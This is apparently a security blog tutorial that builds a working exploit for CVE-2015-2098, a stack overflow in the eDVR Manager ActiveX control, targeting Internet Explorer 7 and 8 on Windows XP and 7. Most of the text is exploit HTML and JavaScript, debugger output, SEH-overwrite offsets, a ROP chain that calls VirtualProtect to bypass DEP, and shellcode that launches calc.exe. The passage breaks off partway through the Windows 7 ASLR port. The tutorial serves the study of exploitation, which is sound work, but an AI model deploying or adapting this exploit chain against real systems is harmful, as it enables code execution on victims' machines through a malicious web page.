In this post, we would be analyzing CVE-2015-2098, a stack buffer overflow vulnerability and will be building a robust exploit for Windows XP and Windows 7.
We would be exploiting this vulnerability using SEH overwrite technique and will further use some methods to circumvent exploit mitigation techniques like DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization).
The end goal of this post would be a robust exploit that will work on multiple platforms (IE 7 and IE8) in various Operating Systems (Windows XP and Windows 7)
Phase 1: Analysis
CVE-2015-2098 is a stack overflow vulnerability in eDVR Manager ActiveX control. The below proof of concept code can be used to trigger the overflow
CVE-2015-2098_POC.html
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<script>
var buffer ="";
for (i=0; i<150; i++)
{
buffer += "A";
}
target.AudioOnlySiteChannel(buffer ,1 ) = 1
</script>
</html>
|
As per the tool’s manual the function AudioOnlySiteChannel() expects a string as the first parameter. If this parameter is passed as an oversized string, it leads to buffer overflow.
We will do our initial analysis on Internet Explorer 7 on Windows XP. Attach the debugger to IE and open the POC mentioned above to observe the crash.
Register context at the crash
0:005> r
eax=00000096 ebx=10070001 ecx=41414121 edx=019ef550 esi=41414141 edi=41414121
eip=10027ed0 esp=019ef534 ebp=019ef5fc iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
WESPPlayback!DllUnregisterServer+0x16320:
10027ed0 8b81541c4200 mov eax,dword ptr IEXPLORE+0x21c54 (00421c54)[ecx] ds:0023:41835d75=????????
|
Disassembly at the time of crash
0:005> u eip
WESPPlayback!DllUnregisterServer+0x16320:
10027ed0 8b81541c4200 mov eax,dword ptr IEXPLORE+0x21c54 (00421c54)[ecx]
10027ed6 53 push ebx
10027ed7 55 push ebp
10027ed8 56 push esi
10027ed9 85c0 test eax,eax
10027edb 57 push edi
10027edc 744a je WESPPlayback!DllUnregisterServer+0x16378 (10027f28)
10027ede 8bf8 mov edi,eax
|
Stack details at the time of crash (Our buffer is at ESP+0x1C)
0:005> dd esp
019ef534 1002a287 019ef550 00000000 008dd7f8
019ef544 1007b0e0 00000000 01db0fd8 41414141
019ef554 41414141 41414141 41414141 41414141
019ef564 41414141 41414141 41414141 41414141
019ef574 41414141 41414141 41414141 41414141
019ef584 41414141 41414141 41414141 41414141
019ef594 41414141 41414141 41414141 41414141
019ef5a4 41414141 41414141 41414141 41414141
|
Attach Immunity debugger to view the corrupted SEH chain
Check the call stack in Immunity Debugger
As per the call stack, the function in which the crash is happening is called from 0x1002A282. The CALL statement is present in the function starting at address 0x1002A1F0
We need to set a breakpoint at the beginning of the function (0x1002A1F0) and analyze each instruction to see which point our stack is getting corrupted.
For setting breakpoint in this ActiveX control, we need to load it in IE. We can create an init.html that will initialize this plugin and then we can reload our POC for triggering the crash after setting a breakpoint at 0x1002A1F0.
CVE-2015-2098_init.html
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<script>
target.AudioOnlySiteChannel("test" ,1 ) = 1
</script>
</html>
|
After our breakpoint is hit at the start of the function, we would monitor the stack:
EIP: 1002A1F0
Stack dump:
We would single step till the stack is filled with “A”s. The following CALL instruction does the magic:
1002A265 50 PUSH EAX ; MaxCount
1002A266 56 PUSH ESI ; Source
1002A267 51 PUSH ECX ; Destination
1002A268 FF15 B8950710 CALL DWORD PTR DS:[<&MSVCRT.wcstombs>]
|
Post stepping to the above WCSTOMBS() function present in MSVCRT.DLL, the stack is filled with the buffer overwriting the SEH chain due to the filling of oversized data in a fixed size buffer.
Reference to WCSTOMBS(): https://msdn.microsoft.com/en-us/library/5d7tc9zw.aspx
Stack dump:
SEH Chain post the wcstombs() function call:
Register context for reference:
In the above analysis, we were able to successfully overwrite SEH chain which is residing on the stack memory due to the buffer overflow caused by filling fixed size memory with huge buffer in wcstombs() function call.
In the next phase, we will develop an exploit for Internet Explorer 7 on Windows XP.
Phase 2: Developing Exploit
In the previous phase, we were able to analyze the root cause of the vulnerability. We will now build an exploit that will work on IE7 on Windows XP.
Previously, our SEH chain was overwritten by 0x41414141 (“AAAA”). Now, we need to identify the exact offset in our buffer that is corrupting the SEH chain. We will generate a random pattern using MONA plugin in Immunity Debugger.
Replace the buffer variable value to the random string generated by the above command and run the POC in IE 7/XP with Immunity debugger attached
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<script>
var buffer ="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9";
target.AudioOnlySiteChannel(buffer ,1 ) = 1
</script>
</html>
|
Corrupted SEH chain:
Using !mona po OFFSET command, we can calculate the offset from our buffer to SEH handler and SEH address.
!mona po 33654132
Pattern 2Ae3 (0x33654132) found in cyclic pattern at position 128
!mona po 41346541
Pattern Ae4A (0x41346541) found in cyclic pattern at position 132
|
We will verify these offsets by customizing the buffer at 128th and 132th position to check if we are able to overwrite SEH address and SEH handler
POC code:
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<script>
var buffer1 ="";
var SEH_addr="";
var SEH_hand="";
var buffer2 ="";
for (i=0; i<128; i++)
{
buffer1 += "A";
}
SEH_addr = "\x01\x02\x03\x04"; // It should overwite SEH address with 0x01020304
SEH_hand = "\x05\x06\x07\x08"; // It should overwite SEH handler with 0x05060708
for (i=0; i<100; i++)
{
buffer2 += "D";
}
buffer = buffer1 + SEH_addr + SEH_hand + buffer2;
target.AudioOnlySiteChannel(buffer ,1 ) = 1
</script>
</html>
|
SEH chain after running the above POC
If we further try to pass the exception and execute the module, it will attempt to execute the SEH handler at 0x08070605
We know that whenever an exception occurs, the pointer to the next exception is stored in ESP+8. Now we need to overwrite this SEH handler with a POP POP RET instruction sequence to get our shellcode/buffer executed on the stack
We can find a POP POP RET sequence using mona.py plugin
!mona findwild -s pop r32#pop r32#ret -m WESPPlayback.dll
We can use any sequence’s address to replace with the SEH handler. Run the below code
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<script>
var buffer1 ="";
var SEH_addr="";
var SEH_hand="";
var buffer2 ="";
for (i=0; i<128; i++)
{
buffer1 += "A";
}
SEH_addr = "\x01\x02\x03\x04";
SEH_hand= "\x35\x7F\x02\x10";
/* 10027f35 pop ebp
10027f36 pop ebx
10027f37 ret
*/
for (i=0; i<100; i++)
{
buffer2 += "D";
}
buffer = buffer1 + SEH_addr + SEH_hand + buffer2;
target.AudioOnlySiteChannel(buffer ,1 ) = 1
</script>
</html>
|
If we execute the above code, the EIP will start pointing to stack at the SEH_addr value
Now since the EIP is pointing to SEH_addr value in the buffer, we need to modify its value so it will jump past the junk instructions due to SEH_addr and SEH_hand.
We will modify it to some JMP instruction and replace our buffer2 value to CC (breakpoint) instruction
SEH_addr= "\x90\xEB\x10\x90";
/* 90 NOP
EB 10 JMP 10h
90 NOP
*/
|
As you can see that due to the JMP code, our EIP is now pointing to buffer2 and has hit the \xCC breakpoint.
Now we can easily modify the buffer2 value to NOP sled (\x90) and append a shellcode that will spawn a calculator as a POC.
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<script>
var buffer1 ="";
var SEH_addr="";
var SEH_hand="";
var buffer2 ="";
var shellcode="";
for (i=0; i<128; i++)
{
buffer1 += "A";
}
SEH_addr= "\x90\xEB\x10\x90";
/* NOP
JMP 10h
NOP
*/
SEH_hand= "\x35\x7F\x02\x10";
/* 10027f35 pop ebp
10027f36 pop ebx
10027f37 ret
*/
for (i=0; i<100; i++)
{
buffer2 += "\x90";
}
shellcode = // Calculator pop-up for XP SP3
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x13\x53\xbb\xad\x23\x86\x7c"+
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"+
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x61\x6c\x63\x2e\x65"+
"\x78\x65";
buffer = buffer1 + SEH_addr + SEH_hand + buffer2 + shellcode;
target.AudioOnlySiteChannel(buffer ,1 ) = 1
</script>
</html>
|
The above exploit code should execute calculator on Internet Explorer 7 in Windows XP
Phase 3: Robustness
In the previous phase, we executed the shellcode on single platform/OS pair (IE7/XP) which does not have any exploitation mitigation in place.
Now, we will port the exploit code on IE8 /Windows XP, which is having Data Execution Prevention (DEP) in place. This exploit mitigation will not allow our shellcode to be executed on the stack as stack memory is marked as READ ONLY.
If you try to run the previously build exploit on IE8/XP, it will throw an error as the exploit will try to execute instructions from the stack memory that is nonexecutable.
0:008> g
(93c.870): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=020bdc14 ecx=10027f35 edx=7c9032bc esi=00000000 edi=00000000
eip=020bf258 esp=020bdb3c ebp=7c9032a8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
020bf258 90 nop
0:008> g
(93c.870): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=020bd854 ecx=10027f35 edx=7c9032bc esi=00000000 edi=00000000
eip=020bf258 esp=020bd77c ebp=7c9032a8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
020bf258 90 nop
|
To bypass DEP mitigation, we would be required to use Return Oriented Programming (ROP) technique to make the stack memory EXECUTABLE.
Firstly, we would be required to point our SEH handler to stack adjusting ROP gadget. For that, we should check how far in the stack memory is our shellcode existing when the exception is triggered.
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<script>
var buffer ="";
var buffer1 = "";
var buffer2 ="";
var SEH_addr ="";
var SEH_hand= "";
for (i=0; i<128; i++)
{
buffer1 += "A";
}
SEH_addr= "BBBB";
SEH_hand= "CCCC";
for (j=0; j<100; j++)
{
buffer2 += "D";
}
var buffer = buffer1 + SEH_addr + SEH_hand + buffer2;
target.AudioOnlySiteChannel(buffer ,1 ) = 1
</script>
</html>
|
Crash details from the above POC. If we step onto the SEH handler, we can see our buffer in ~(ESP+400)
(a94.3fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000000ec ebx=10070001 ecx=44444424 edx=020bf1d8 esi=44444444 edi=44444424
eip=10027ed0 esp=020bf1bc ebp=020bf284 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
10027ed0 8b81541c4200 mov eax,dword ptr IEXPLORE+0x21c54 (00421c54)[ecx] ds:0023:44866078=????????
0:008> g
(a94.3fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
eip=43434343 esp=020bedec ebp=020bee0c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
43434343 ?? ???
0:008> dd esp
020bedec 7c9032a8 020beed4 020bf258 020beef0
020bedfc 020beea8 020bf258 7c9032bc 020bf258
020bee0c 020beebc 7c90327a 020beed4 020bf258
020bee1c 020beef0 020beea8 43434343 44444424
020bee2c 020beed4 020bf258 7c92a9ef 020beed4
020bee3c 020bf258 020beef0 020beea8 43434343
020bee4c 44444424 020beed4 44444444 7c90cfdc
020bee5c 020bee40 000004c0 020bf798 7c839ac0
0:008> dd esp+400
020bf1ec 41414141 41414141 41414141 41414141
020bf1fc 41414141 41414141 41414141 41414141
020bf20c 41414141 41414141 41414141 41414141
020bf21c 41414141 41414141 41414141 41414141
020bf22c 41414141 41414141 41414141 41414141
020bf23c 41414141 41414141 41414141 41414141
020bf24c 41414141 41414141 41414141 42424242
020bf25c 43434343 44444444 44444444 44444444
|
We need to adjust the stack so that our first stack adjusting ROP gadget is properly aligned with the entire ROP chain. Let’s find the first gadget in Immunity
Let’s use the ROP gadget at 0x1003C3F9 – ADD ESP, 4E0 and increase the buffer size
for (i=0; i<128; i++)
{
buffer1 += "A";
}
SEH_addr= "BBBB";
SEH_hand= "\xF9\xC3\x03\x10"; //0x1003C3F9
/*
1003C3F9 ADD ESP,4E0
1003C3FF RETN
*/
for (j=0; j<2000; j++)
{
buffer2 += "D";
}
var buffer = buffer1 + SEH_addr + SEH_hand + buffer2;
target.AudioOnlySiteChannel(buffer ,1 ) = 1
|
Below is the stack memory status during the execution of our first ROP gadget. Post this ROP execution, our EIP is pointing to 0x44444444.
0:008> bp 0x1003C3F9
0:008> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=1003c3f9 edx=7c9032bc esi=00000000 edi=00000000
eip=1003c3f9 esp=020bedec ebp=020bee0c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
WESPPlayback!DllUnregisterServer+0x2a849:
1003c3f9 81c4e0040000 add esp,4E0h
0:008> dd esp
020bedec 7c9032a8 020beed4 020bf258 020beef0
020bedfc 020beea8 020bf258 7c9032bc 020bf258
020bee0c 020beebc 7c90327a 020beed4 020bf258
020bee1c 020beef0 020beea8 1003c3f9 44444424
020bee2c 020beed4 020bf258 7c92a9ef 020beed4
020bee3c 020bf258 020beef0 020beea8 1003c3f9
020bee4c 44444424 020beed4 44444444 7c90cfdc
020bee5c 020bee40 000004d4 020bf798 7c839ac0
0:008> p
eax=00000000 ebx=00000000 ecx=1003c3f9 edx=7c9032bc esi=00000000 edi=00000000
eip=1003c3ff esp=020bf2cc ebp=020bee0c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206
WESPPlayback!DllUnregisterServer+0x2a84f:
1003c3ff c3 ret
0:008> dd esp
020bf2cc 44444444 44444444 44444444 44444444
020bf2dc 44444444 44444444 44444444 44444444
020bf2ec 44444444 44444444 44444444 44444444
020bf2fc 44444444 44444444 44444444 44444444
020bf30c 44444444 44444444 44444444 44444444
020bf31c 44444444 44444444 44444444 44444444
020bf32c 44444444 44444444 44444444 44444444
020bf33c 44444444 44444444 44444444 44444444
0:008> p
eax=00000000 ebx=00000000 ecx=1003c3f9 edx=7c9032bc esi=00000000 edi=00000000
eip=44444444 esp=020bf2d0 ebp=020bee0c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206
44444444 ?? ???
|
We need to adjust now our buffer so that our ROP chain is properly aligned with this gadget. We can create a random pattern using Mona.py to identify the offset in buffer2 variable for EIP.
We’ll replace that long random pattern in buffer2 value
for (i=0; i<128; i++)
{
buffer1 += "A";
}
SEH_addr= "BBBB";
SEH_hand= "\xF9\xC3\x03\x10"; //0x1003C3F9
buffer2 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co";
var buffer = buffer1 + SEH_addr + SEH_hand + buffer2;
target.AudioOnlySiteChannel(buffer ,1 ) = 1;
|
From the above POC, we concluded that our ROP chain should start at 108 bytes down in buffer2. We found a working ROP chain for MSVCR71.dll
Reference: https://www.corelan.be/index.php/security/corelan-ropdb/#msvcr71dll_8211_v71030524
ROP_chain =
"\x3d\x65\x37\x7c"+ // POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
"\xff\xfd\xff\xff"+ // Value to negate, will become 0x00000201 (dwSize)
"\x98\x7f\x34\x7c"+ // RETN (ROP NOP) [msvcr71.dll]
"\xa2\x15\x34\x7c"+ // JMP [EAX] [msvcr71.dll]
"\xff\xff\xff\xff"+ //
"\x02\x64\x37\x7c"+ // skip 4 bytes [msvcr71.dll]
"\x05\x1e\x35\x7c"+ // NEG EAX # RETN [msvcr71.dll]
"\x55\x52\x34\x7c"+ // INC EBX # FPATAN # RETN [msvcr71.dll]
"\x74\x21\x35\x7c"+ // ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
"\x87\x4f\x34\x7c"+ // POP EDX # RETN [msvcr71.dll]
"\xc0\xff\xff\xff"+ // Value to negate, will become 0x00000040
"\xb1\x1e\x35\x7c"+ // NEG EDX # RETN [msvcr71.dll]
"\x01\xd2\x34\x7c"+ // POP ECX # RETN [msvcr71.dll]
"\x01\xb0\x38\x7c"+ // &Writable location [msvcr71.dll]
"\x97\x7f\x34\x7c"+ // POP EAX # RETN [msvcr71.dll]
"\x51\xa1\x37\x7c"+ // ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
"\x81\x8c\x37\x7c"+ // PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
"\x30\x5c\x34\x7c"; // ptr to 'push esp # ret ' [msvcr71.dll]
|
Let us append the above ROP chain post 108 bytes in buffer2 variable
for (i=0; i<128; i++)
{
buffer1 += "A";
}
SEH_addr= "BBBB";
SEH_hand= "\xF9\xC3\x03\x10"; //0x1003C3F9
for (j=0; j<108; j++)
{
buffer2 += "C";
}
ROP_chain =
"\x3d\x65\x37\x7c"+ // POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
"\xff\xfd\xff\xff"+ // Value to negate, will become 0x00000201 (dwSize)
"\x98\x7f\x34\x7c"+ // RETN (ROP NOP) [msvcr71.dll]
"\xa2\x15\x34\x7c"+ // JMP [EAX] [msvcr71.dll]
"\xff\xff\xff\xff"+ //
"\x02\x64\x37\x7c"+ // skip 4 bytes [msvcr71.dll]
"\x05\x1e\x35\x7c"+ // NEG EAX # RETN [msvcr71.dll]
"\x55\x52\x34\x7c"+ // INC EBX # FPATAN # RETN [msvcr71.dll]
"\x74\x21\x35\x7c"+ // ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
"\x87\x4f\x34\x7c"+ // POP EDX # RETN [msvcr71.dll]
"\xc0\xff\xff\xff"+ // Value to negate, will become 0x00000040
"\xb1\x1e\x35\x7c"+ // NEG EDX # RETN [msvcr71.dll]
"\x01\xd2\x34\x7c"+ // POP ECX # RETN [msvcr71.dll]
"\x01\xb0\x38\x7c"+ // &Writable location [msvcr71.dll]
"\x97\x7f\x34\x7c"+ // POP EAX # RETN [msvcr71.dll]
"\x51\xa1\x37\x7c"+ // ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
"\x81\x8c\x37\x7c"+ // PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
"\x30\x5c\x34\x7c"; // ptr to 'push esp # ret ' [msvcr71.dll]
var buffer = buffer1 + SEH_addr + SEH_hand + buffer2 + ROP_chain;
target.AudioOnlySiteChannel(buffer ,1 ) = 1;
|
After executing the above POC, we were successfully able to execute data from the stack memory as shown below
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000013c ebx=10070001 ecx=43434323 edx=020bf1d8 esi=43434343 edi=43434323
eip=10027ed0 esp=020bf1bc ebp=020bf284 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
*** WARNING: Unable to verify checksum for C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll -
WESPPlayback!DllUnregisterServer+0x16320:
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Internet Explorer\IEXPLORE.EXE
10027ed0 8b81541c4200 mov eax,dword ptr IEXPLORE+0x21c54 (00421c54)[ecx] ds:0023:43855f77=????????
0:008> g
(6cc.958): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=24a48dc3 ebx=000002e5 ecx=020bf2b4 edx=7c90e4f4 esi=7c3415a2 edi=7c347f98
eip=020bf31a esp=020bf314 ebp=7c37a151 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
020bf31a 0110 add dword ptr [eax],edx ds:0023:24a48dc3=????????
|
Now we just need to add a NOP sled and then shellcode to get our exploit working
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<script>
var buffer ="";
var buffer1 = "";
var buffer2 ="";
var SEH_addr ="";
var SEH_hand= "";
var ROP_chain="";
var NOP_sled="";
var shellcode="";
for (i=0; i<128; i++)
{
buffer1 += "A";
}
SEH_addr= "BBBB";
SEH_hand= "\xF9\xC3\x03\x10"; //0x1003C3F9
for (j=0; j<108; j++)
{
buffer2 += "C";
}
ROP_chain =
"\x3d\x65\x37\x7c"+ // POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
"\xff\xfd\xff\xff"+ // Value to negate, will become 0x00000201 (dwSize)
"\x98\x7f\x34\x7c"+ // RETN (ROP NOP) [msvcr71.dll]
"\xa2\x15\x34\x7c"+ // JMP [EAX] [msvcr71.dll]
"\xff\xff\xff\xff"+ //
"\x02\x64\x37\x7c"+ // skip 4 bytes [msvcr71.dll]
"\x05\x1e\x35\x7c"+ // NEG EAX # RETN [msvcr71.dll]
"\x55\x52\x34\x7c"+ // INC EBX # FPATAN # RETN [msvcr71.dll]
"\x74\x21\x35\x7c"+ // ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
"\x87\x4f\x34\x7c"+ // POP EDX # RETN [msvcr71.dll]
"\xc0\xff\xff\xff"+ // Value to negate, will become 0x00000040
"\xb1\x1e\x35\x7c"+ // NEG EDX # RETN [msvcr71.dll]
"\x01\xd2\x34\x7c"+ // POP ECX # RETN [msvcr71.dll]
"\x01\xb0\x38\x7c"+ // &Writable location [msvcr71.dll]
"\x97\x7f\x34\x7c"+ // POP EAX # RETN [msvcr71.dll]
"\x51\xa1\x37\x7c"+ // ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
"\x81\x8c\x37\x7c"+ // PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
"\x30\x5c\x34\x7c"; // ptr to 'push esp # ret ' [msvcr71.dll]
for (j=0; j<100; j++)
{
NOP_sled += "\x90";
}
shellcode = // Calculator pop-up for XP SP3
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x13\x53\xbb\xad\x23\x86\x7c"+
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"+
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x61\x6c\x63\x2e\x65"+
"\x78\x65";
var buffer = buffer1 + SEH_addr + SEH_hand + buffer2 + ROP_chain + NOP_sled + shellcode;
target.AudioOnlySiteChannel(buffer ,1 ) = 1;
</script>
</html>
|
We will now port this exploit to Windows 7 bypassing both DEP and ASLR mitigation
For bypassing DEP, we will use the similar ROP technique described previously. And for bypassing ASLR, we may use either memory leaks or non-ASLR modules.
We can try to look for Non-ASLR modules loaded in IE 8/Windows 7 using the mona.py plugin of Immunity debugger:
!mona noaslr
|
Fortunately, we can find the same MSVCRT71.dll, which is previously used for ROP chaining, as a Non-ASLR module. Hence, we can use the same ROP chain sequence to make the stack memory as executable.
We need to realign our stack using the ADD ESP, 4E0 gadget, as done previously, for our new environment IE8/Win7 and check the offset of buffer2 value that is overwriting the EIP
for (i=0; i<128; i++)
{
buffer1 += "A";
}
var SEH_addr= "BBBB";
var SEH_hand= "\xF9\xC3\x03\x10";
/*
1003C3F9 ADD ESP,4E0
1003C3FF RETN
*/
